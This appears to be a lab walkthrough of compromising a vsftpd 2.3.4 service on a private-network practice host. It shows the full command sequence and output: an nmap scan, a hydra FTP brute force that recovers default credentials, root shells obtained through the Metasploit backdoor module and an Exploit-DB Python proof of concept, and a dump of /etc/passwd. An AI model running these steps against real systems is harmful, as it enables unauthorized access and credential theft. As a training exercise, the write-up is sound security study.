Network Scan
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 ┌──(root㉿kali)-[/home/kali/Desktop/cd] └─# nmap -A -sV 192.168.244.136 Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-05 15:58 EST Nmap scan report for 192.168.244.136 (192.168.244.136) Host is up (0.00064s latency). Not shown: 977 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.244.140 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | vsFTPd 2.3.4 - secure, fast, stable |_End of status
VSFTPD 2.3.4 exploit with hydra
First , we need construct dictionaries about username and password
then , we use the tools hydra with the follow command line:
1 hydra -L /home/kali/Desktop/cd/mywordlists/usernames.txt -P /home/kali/Desktop/cd/mywordlists/passwords.txt 192.168.244.136 ftp -V
here’s the command line ouput looks like:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-01-26 16:20:39 [DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task [DATA] attacking ftp://192.168.244.136:21/ [ATTEMPT] target 192.168.244.136 - login "admin" - pass "admin" - 1 of 25 [child 0] (0/0) [ATTEMPT] target 192.168.244.136 - login "admin" - pass "msfadmin" - 2 of 25 [child 1] (0/0) [ATTEMPT] target 192.168.244.136 - login "admin" - pass "root" - 3 of 25 [child 2] (0/0) [ATTEMPT] target 192.168.244.136 - login "admin" - pass "user" - 4 of 25 [child 3] (0/0) [ATTEMPT] target 192.168.244.136 - login "admin" - pass "" - 5 of 25 [child 4] (0/0) [ATTEMPT] target 192.168.244.136 - login "msfadmin" - pass "admin" - 6 of 25 [child 5] (0/0) [ATTEMPT] target 192.168.244.136 - login "msfadmin" - pass "msfadmin" - 7 of 25 [child 6] (0/0) [ATTEMPT] target 192.168.244.136 - login "msfadmin" - pass "root" - 8 of 25 [child 7] (0/0) [ATTEMPT] target 192.168.244.136 - login "msfadmin" - pass "user" - 9 of 25 [child 8] (0/0) [ATTEMPT] target 192.168.244.136 - login "msfadmin" - pass "" - 10 of 25 [child 9] (0/0) [ATTEMPT] target 192.168.244.136 - login "root" - pass "admin" - 11 of 25 [child 10] (0/0) [ATTEMPT] target 192.168.244.136 - login "root" - pass "msfadmin" - 12 of 25 [child 11] (0/0) [ATTEMPT] target 192.168.244.136 - login "root" - pass "root" - 13 of 25 [child 12] (0/0) [ATTEMPT] target 192.168.244.136 - login "root" - pass "user" - 14 of 25 [child 13] (0/0) [ATTEMPT] target 192.168.244.136 - login "root" - pass "" - 15 of 25 [child 14] (0/0) [ATTEMPT] target 192.168.244.136 - login "user" - pass "admin" - 16 of 25 [child 15] (0/0) [21][ftp] host: 192.168.244.136 login: msfadmin password: msfadmin [ATTEMPT] target 192.168.244.136 - login "user" - pass "msfadmin" - 17 of 25 [child 6] (0/0) [ATTEMPT] target 192.168.244.136 - login "user" - pass "root" - 18 of 25 [child 5] (0/0) [ATTEMPT] target 192.168.244.136 - login "user" - pass "user" - 19 of 25 [child 7] (0/0) [ATTEMPT] target 192.168.244.136 - login "user" - pass "" - 20 of 25 [child 8] (0/0) [ATTEMPT] target 192.168.244.136 - login "" - pass "admin" - 21 of 25 [child 9] (0/0) [ATTEMPT] target 192.168.244.136 - login "" - pass "msfadmin" - 22 of 25 [child 0] (0/0) [ATTEMPT] target 192.168.244.136 - login "" - pass "root" - 23 of 25 [child 1] (0/0) [ATTEMPT] target 192.168.244.136 - login "" - pass "user" - 24 of 25 [child 2] (0/0) [ATTEMPT] target 192.168.244.136 - login "" - pass "" - 25 of 25 [child 4] (0/0) [21][ftp] host: 192.168.244.136 login: user password: user 1 of 1 target successfully completed, 2 valid passwords found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-03-05 21:20:47
here, we found two users we could use to login the ftp server:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 ftp 192.168.244.136 Connected to 192.168.244.136. 220 (vsFTPd 2.3.4) Name (192.168.244.136:kali): msfadmin 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||54670|). 150 Here comes the directory listing. -rw-r--r-- 1 1000 1000 0 Oct 21 21:49 gordon.txt -rw-r--r-- 1 1000 1000 29 Oct 30 23:31 myfile.log -rw-r--r-- 1 1000 1000 914 Oct 21 14:59 nmap-list.txt drwxr-xr-x 6 1000 1000 4096 Apr 28 2010 vulnerable 226 Directory send OK. ftp> cd / 250 Directory successfully changed. ftp> pwd Remote directory: / ftp> ls 229 Entering Extended Passive Mode (|||54956|). 150 Here comes the directory listing. drwxr-xr-x 2 0 0 4096 May 14 2012 bin drwxr-xr-x 4 0 0 1024 May 14 2012 boot lrwxrwxrwx 1 0 0 11 Apr 28 2010 cdrom -> media/cdrom drwxr-xr-x 13 0 0 13860 Jan 05 20:57 dev drwxr-xr-x 94 0 0 4096 Jan 05 21:21 etc drwxr-xr-x 6 0 0 4096 Apr 16 2010 home drwxr-xr-x 2 0 0 4096 Mar 16 2010 initrd lrwxrwxrwx 1 0 0 32 Apr 28 2010 initrd.img -> boot/initrd.img-2.6.24-16-server drwxr-xr-x 13 0 0 4096 May 14 2012 lib drwx------ 2 0 0 16384 Mar 16 2010 lost+found drwxr-xr-x 4 0 0 4096 Mar 16 2010 media drwxr-xr-x 3 0 0 4096 Apr 28 2010 mnt -rw------- 1 0 0 57012 Jan 05 20:54 nohup.out drwxr-xr-x 2 0 0 4096 Mar 16 2010 opt dr-xr-xr-x 118 0 0 0 Jan 05 20:54 proc drwxr-xr-x 13 0 0 4096 Jan 05 20:54 root drwxr-xr-x 2 0 0 4096 May 14 2012 sbin drwxr-xr-x 2 0 0 4096 Mar 16 2010 srv drwxr-xr-x 12 0 0 0 Jan 05 20:54 sys drwxrwxrwt 5 0 0 4096 Jan 05 20:59 tmp drwxr-xr-x 12 0 0 4096 Apr 28 2010 usr drwxr-xr-x 14 0 0 4096 Mar 17 2010 var lrwxrwxrwx 1 0 0 29 Apr 28 2010 vmlinuz -> boot/vmlinuz-2.6.24-16-server 226 Directory send OK.
VSFTPD 2.3.4 exploit with metasploit:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 msf6 > search vsftpd Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/dos/ftp/vsftpd_232 2011-02-03 normal Yes VSFTPD 2.3.2 Denial of Service 1 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution Interact with a module by name or index. For example info 1, use 1 or use exploit/unix/ftp/vsftpd_234_backdoor msf6 > use 1 [*] No payload configured, defaulting to cmd/unix/interact msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show info Name: VSFTPD v2.3.4 Backdoor Command Execution Module: exploit/unix/ftp/vsftpd_234_backdoor Platform: Unix Arch: cmd Privileged: Yes License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2011-07-03 Provided by: hdm <x@hdm.io> MC <mc@metasploit.com> Available targets: Id Name -- ---- => 0 Automatic Check supported: No Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html RPORT 21 yes The target port (TCP) Payload information: Space: 2000 Avoid: 0 characters Description: This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was introduced into the vsftpd-2.3.4.tar.gz archive between June 30th 2011 and July 1st 2011 according to the most recent information available. This backdoor was removed on July 3rd 2011. References: OSVDB (73573) http://pastebin.com/AetT9sS5 http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html View the full module info with the info -d command. msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.244.136 rhosts => 192.168.244.136 msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run [*] 192.168.244.136:21 - Banner: 220 (vsFTPd 2.3.4) [*] 192.168.244.136:21 - USER: 331 Please specify the password. [+] 192.168.244.136:21 - Backdoor service has been spawned, handling... [+] 192.168.244.136:21 - UID: uid=0(root) gid=0(root) [*] Found shell. id [*] Command shell session 1 opened (192.168.244.140:41279 -> 192.168.244.136:6200) at 2024-01-05 16:46:43 -0500 uid=0(root) gid=0(root) ip addr 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:0c:29:d5:0c:8b brd ff:ff:ff:ff:ff:ff inet 192.168.244.136/24 brd 192.168.244.255 scope global eth0 inet6 fe80::20c:29ff:fed5:c8b/64 scope link valid_lft forever preferred_lft forever 3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000 link/ether 00:0c:29:d5:0c:95 brd ff:ff:ff:ff:ff:ff
VSFTPD 2.3.4 exploit with python POC:
First, we should search the valid POC from kali’s exploit db with follow command line:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 ┌──(root㉿kali)-[/home/kali/Desktop/cd] └─# searchsploit -t vsftpd ---------------------------------------------------------------------------------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------- vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption | linux/dos/5814.pl vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1) | windows/dos/31818.sh vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2) | windows/dos/31819.pl vsftpd 2.3.2 - Denial of | linux/dos/16270.c vsftpd 2.3.4 - Backdoor Command Execution | unix/remote/49757.py vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb vsftpd 3.0.3 - Remote Denial of Service | multiple/remote/49719.py ------------------------------------------------------------------------------------------------------------ Shellcodes: No Results Papers: No Results
Next, we copy the valid POC to current work directory, and try to exploit , the follow shows the exploit process:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 ┌──(root㉿kali)-[/home/kali/Desktop/cd] └─# searchsploit -m unix/remote/49757.py Exploit: vsftpd 2.3.4 - Backdoor Command Execution URL: https://www.exploit-db.com/exploits/49757 Path: /usr/share/exploitdb/exploits/unix/remote/49757.py Codes: CVE-2011-2523 Verified: True File Type: Python script, ASCII text executable cp: overwrite '/home/kali/Desktop/cd/49757.py'? yes Copied to: /home/kali/Desktop/cd/49757.py ┌──(root㉿kali)-[/home/kali/Desktop/cd] └─# chmod +x 49757.py ┌──(root㉿kali)-[/home/kali/Desktop/cd] └─# ls 49757.py wordlists ┌──(root㉿kali)-[/home/kali/Desktop/cd] └─# python ./49757.py 192.168.244.136 Success, shell opened Send `exit` to quit shell ip addr 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000 link/ether 00:0c:29:d5:0c:8b brd ff:ff:ff:ff:ff:ff inet 192.168.244.136/24 brd 192.168.244.255 scope global eth0 inet6 fe80::20c:29ff:fed5:c8b/64 scope link valid_lft forever preferred_lft forever 3: eth1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop qlen 1000 link/ether 00:0c:29:d5:0c:95 brd ff:ff:ff:ff:ff:ff pwd / ls bin boot cdrom dev etc home initrd initrd.img lib lost+found media mnt nohup.out opt proc root sbin srv sys tmp usr var vmlinuz cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false postfix:x:106:115::/var/spool/postfix:/bin/false ftp:x:107:65534::/home/ftp:/bin/false postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false distccd:x:111:65534::/:/bin/false user:x:1001:1001:just a user,111,,:/home/user:/bin/bash service:x:1002:1002:,,,:/home/service:/bin/bash telnetd:x:112:120::/nonexistent:/bin/false proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/false